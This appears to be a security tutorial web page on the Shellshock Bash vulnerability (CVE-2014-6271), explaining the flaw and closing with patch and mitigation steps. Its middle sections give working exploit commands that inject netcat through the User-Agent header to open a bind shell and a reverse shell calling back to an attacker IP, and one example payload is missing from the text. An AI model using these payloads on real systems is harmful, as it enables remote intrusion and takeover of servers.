MENU

On This Page

  1. How It Works
  2. Bind Shell
  3. Reverse Shell
  4. Impact and Mitigation

CVE-2014-6271(Shellshock)

CVE-2014-6271, commonly known as Shellshock, is a critical vulnerability in the GNU Bourne Again Shell (Bash). It allows attackers to execute arbitrary commands on a target system by exploiting how Bash processes environment variables. This vulnerability affects systems where Bash is used to handle script execution - particularly in CGI (Common Gateway Interface) web server configurations.

How It Works

When a web server (such as Apache) receives an HTTP request, it often passes headers and parameters to CGI scripts. These values are converted into environment variables before launching the script. If the CGI script is written in Bash or calls Bash indirectly, any maliciously crafted environment variable can trigger unintended command execution.

The vulnerability arises because Bash allows function definitions to be exported via environment variables. However, it fails to properly sanitize code that comes after the function definition, executing it as part of the shell initialization.

For example, an attacker can inject a payload in the User-Agent header:

In this case:

  • () { :;}; defines a valid (but empty) Bash function.
  • is additional code that Bash will execute due to the flaw.

This results in the contents of /etc/passwd being printed in the server's response - confirming successful arbitrary command execution.

Bind Shell

One way to gain interactive access is by setting up a bind shell, which opens a listening port on the target machine and connects the shell session to it. 

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80

This command starts a netcat listener on port 9999, binding a shell to it. You could then connect to vulnerable:9999 and get a remote shell.

Limitation: Firewalls or network policies often block incoming connections to arbitrary ports, making bind shells unreliable in many real-world scenarios.

Reverse Shell

A more effective method is the reverse shell, where the target connects back to the attacker's machine - bypassing most firewall restrictions.

  1. Start a listener on your machine:
    2. # nc -l -p 443

    Port 443 is used because it's commonly allowed through firewalls for HTTPS traffic.

  2. Send the reverse shell payload:
    3. echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80

    Replace 192.168.159.1 with your actual IP address.

Once executed, the vulnerable server will initiate a connection back to your machine on port 443, providing full shell access.

Impact and Mitigation

Severity: Critical - CVSS Score: 10.0 (Maximum risk)
Affected Systems: Any system running vulnerable versions of Bash (prior to patch releases in September 2014)

Mitigation Steps:

  • Update Bash to a patched version using your system's package manager:
    • # On Debian/Ubuntu
sudo apt update && sudo apt install --only-upgrade bash

# On CentOS/RHEL
sudo yum update bash
  • Disable CGI scripts that invoke Bash unless absolutely necessary.
  • Use WAF (Web Application Firewall) rules to detect and block Shellshock-style payloads.
  • Minimize the use of shell scripts in server-side environments.

Published on Aug 21, 2025